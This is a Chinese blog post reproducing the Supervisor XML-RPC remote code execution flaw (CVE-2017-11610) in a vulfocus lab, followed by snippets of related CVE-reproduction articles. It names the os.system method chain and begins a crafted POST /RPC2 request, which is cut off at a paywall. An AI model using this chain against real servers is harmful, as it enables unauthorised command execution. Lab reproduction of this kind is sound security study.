入侵防御漏洞复现(三)

已于 2024-01-19 13:41:08 修改
阅读量653 收藏 9
点赞数 9
CC 4.0 BY-SA版权
分类专栏: 漏洞复现 文章标签: web安全
于 2024-01-19 12:26:31 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/szdx1043/article/details/135692179

一、CVE-2017-11610 Supervisor XML-RPC认证用户远程代码执行漏洞——漏洞攻击

1.简介

Supervisor是一套进程控制系统,用于监视和控制类Unix系统上的进程。XML-RPC server是其中的一个XML-RPC服务器。Supervisor中的XML-RPC服务器存在安全漏洞。远程攻击者可借助特制的XML-RPC请求利用该漏洞执行任意命令。以下版本受到影响:supervisor 3.0.1之前的版本,3.1.4之前的3.1.x版本,3.2.4之前的3.2.x版本,3.3.3之前的3.3.x版本。

2.vulfocus搭建靶场

下面截图图中访问地址实际和端口使192.168.20.240:26789

3.攻击源构造burpsuite报文

访问192.168.20.240:26789, burpsuite拦截报文内容后,发送到repeater, 构造包含supervisor.supervisord.options.warnings.linecache.os.system的如下报文发送,发送成功后,靶机上会自动在/tmp目录下生成success文件

POST /RPC2 HTTP/1.1
Host: 192.168.20.240:26789
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.199 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Len
最低0.47元/天 解锁文章

200万优质内容无限畅学
漏洞复现】Cisco IOS XE Web UI-权限提升漏洞(CVE-2023-20198)
知黑而守白
06-20 597
Cisco IOS XE Web UI 权限提升漏洞(CVE-2023-20198),当Cisco IOS XE Web UI在互联网公开时,恶意攻击者可能会利用此漏洞添加具有15级访问权限的账户,使服器处于继不安全的状态。Cisco IOS XE是思科公司的一种网络操作系统,提供了用于管理和配置网络设备的用户界面。其中,Web UI是一种通过Web浏览器访问的用户界面,允许管理员轻松地配置和管理路由器和交换机等网络设备。影响范围:启用了Web UI功能的Cisco IOS XE。
Supervisord远程命令执行漏洞(CVE-2017-11610)
谢公子的博客
09-20 3159
目录 Supervisor 漏洞复现 修复建议 Supervisor Supervisor是使用Python 开发的进程管理程序,一般使用命令行进行管理,当然也能通过web接口图形化管理服务。在配置了web接口后,服务器会启动一个XML RPC服务器,端口为9001,默认配置接口是不需要密码访问的,管理员也可设置为密码访问。利用本漏洞,在获取该接口的访问权限后,远程攻击者可发送一段精心构...
Supervisord 远程代码执行漏洞CVE-2017-11610漏洞复现
OKAY_TC的博客
04-22 4207
复现视频链接:https://www.ichunqiu.com/course/58895 如下内容为复现及笔记 Supervisord 远程代码执行漏洞CVE-2017-11610漏洞复现 0x01 漏洞信息 Supervisord是使用Python 开发的进程管理程序,Supervisord能够将命令行进程或服务变为后台运行的deamon(守护进程)。Supervisord拥有监控进...
supervisor入门到精通
weixin_30662011的博客
12-27 257
1.介绍 Supervisor是基于 Python 的进程管理工具,只能运行在 Unix-Like 的系统上,也就是无法运行在 Windows 上。Supervisor 官方版目前只能运行在 Python 2.4 以上版本,但是还无法运行在 Python 3 上,不过已经有一个 Python 3 的移植版supervisor-py3k。 在一个分布式环境中,每台机器上可能需要启动和停止多个...
漏洞公告】CVE-2017-11610:Supervisord 远程命令执行漏洞
CS13522431352的博客
08-09 750
Supervisord是一款由Python语言开发,用于管理后台应用(服务)的工具,方便运维人员使用图形化界面进行管理。 近期,Supervisord曝出了一个需认证的远程命令执行漏洞CVE-2017-11610),通过POST请求Supervisord管理界面恶意数据,可以获取服务器操作权限,存在严重的安全风险。
Supervisord 远程命令执行漏洞CVE-2017-11610
m0_49025459的博客
12-13 252
【代码】Supervisord 远程命令执行漏洞CVE-2017-11610
python supervisord 远程命令执行漏洞CVE-2017-11610
whatday的专栏
06-27 856
Supervisord Supervisord是一款Python开发,用于管理后台应用(服务)的工具,其角色类似于Linux自带的Systemd。 我觉得它相比Systemd有几个特点: 配置比较简单 一个简单的第方应用,与系统没有耦合 提供HTTP API,支持远程操作 所以,我之前把他用来跑一些Web应用。 Supervisord的架构分为Server和Client,Server以一个服务的形式,跑在系统后台,而Client是一个命令行工具,其实就是根据用户的要求,调用Server提供的A
入侵防御漏洞复现()
szdx1043的博客
01-16 612
Nostromo由于在验证URL安全性方面存在,导致目录穿越,任何人都可以系统中任何文件。因此未经过身份验证的远程攻击者可以强制服务器指向/bin/sh这样的shell文件,借此执行任意命令。
漏洞复现学习:openfire鉴权绕过漏洞复现CVE-2024-32315)_openfireadministrationconsole
2401_84254057的博客
05-04 1244
在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。第一张图里的代码,它会先判读是否含有setup/setup-*,如过含有就会跳到下面的判读,接下来的判断就是对用户输入的字符串进行一个过滤,如果用户输入的字符串不含有**…恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;到此为止,大概1个月的时间。
2024年[永恒之蓝]实战-漏洞复现_永恒之蓝漏洞复现实验(1),2024年最新网络安全中高级面试必知必会
m0_60691292的博客
05-05 832
在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;8、显示meterpreter,我们已经所渗透成功了,现在我们已经拿到目标机的Shell了。3、我们在第二步的时候使用的是auxiliary模块进行的漏洞检测,这回我们使用exploit模块进行漏洞利用。
漏洞复现】Apache-OFBiz xmlrpc远程代码执行漏洞CVE-2023-49070
失心少年
01-13 249
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!Apache-OFBiz xmlrpc远程代码执行漏洞,Apache OFBiz是Apache基金会的一套企业资源计划(ERP)系统。攻击者可以通过在受攻击系统上执行恶意命令,从而获取未授权的系统访问权限。
6 安全特性,值得推荐
2401_83974064的博客
04-03 984
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!
Apache OFBiz XML-RPC远程代码执行漏洞(CVE-2023-49070)漏洞复现
qq_53733257的博客
12-11 2406
CVE-2023-49070 漏洞复现
漏洞复现CVE-2017-12615)
PDblue的博客
03-27 4594
使用https://github.com/vulhub/vulhub/搭建漏洞测试环境 搭建完成后访问http://host:8080 使用burpsuite抓包,修改数据包进行后门文件上传 上传完成后网站返回201 通过浏览器访问后门文件测试是否上传成功 后门文件成功执行命令,说明漏洞利用成功...
Tomcat远程代码执行漏洞CVE-2017-12615)
热门推荐
Unitue_逆流
10-14 1万+
实验环境操作机:windows XPIP:172.16.11.2目标机:windows server 2003IP:172.16.12.2实验目的了解Tomcat远程代码执行漏洞危害掌握检测利用Tomcat远程代码执行漏洞的能力实验工具Firefox: 中文俗称火狐,一个自由及开放源代码网页浏览器实验内容 TomcatTomcat服务器是一个免费的开放源代码的Web应用服务器。Tomcat是Apa
BlueBorne远程代码执行漏洞Poc实战(CVE-2017-0781)
小蓝人敌法的专栏
12-12 3355
BlueBorne远程代码执行漏洞Poc实战(CVE-2017-0781) 前几天,一个名为Armis的公司发布了Android设备上的一个蓝牙远程代码执行漏洞CVE-2017-0781)的Poc,漏洞命名为BlueBorne,尽管BlueBorne漏洞涉及到了8个漏洞点,但是这个Poc只用了其中的2个就达到了利用的目的。 整个利用过程分为2个阶段,Poc先是使用了内存泄露漏洞(CVE-2017-
.NET Framework漏洞(CVE-2017-8759)复现及后续渗透
sanc7ane的博客
02-25 7860
参考:!bhdresh 简介 CVE-2017-8759是一个新型的Office文档高级威胁攻击漏洞,该漏洞允许恶意人士在解析SOAP WSDL的定义内容期间注入任意代码。FireEye公司对该微软Office文档进行了分析,并发现攻击者能够利用代码注入方式下载并执行一份包含PowerShell指令的Visual Basic脚本。黑客在Offcie文档中嵌入新的Moniker对象,利用的是.net...
永恒之蓝漏洞复现
最新发布
03-16
### 永恒之蓝漏洞复现方法与原理 #### 背景概述 永恒之蓝(EternalBlue)是一个针对 Windows 系统 SMB 协议的远程代码执行漏洞,编号为 CVE-2017-0144。该漏洞允许攻击者通过网络访问未授权的目标主机并获得系统...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值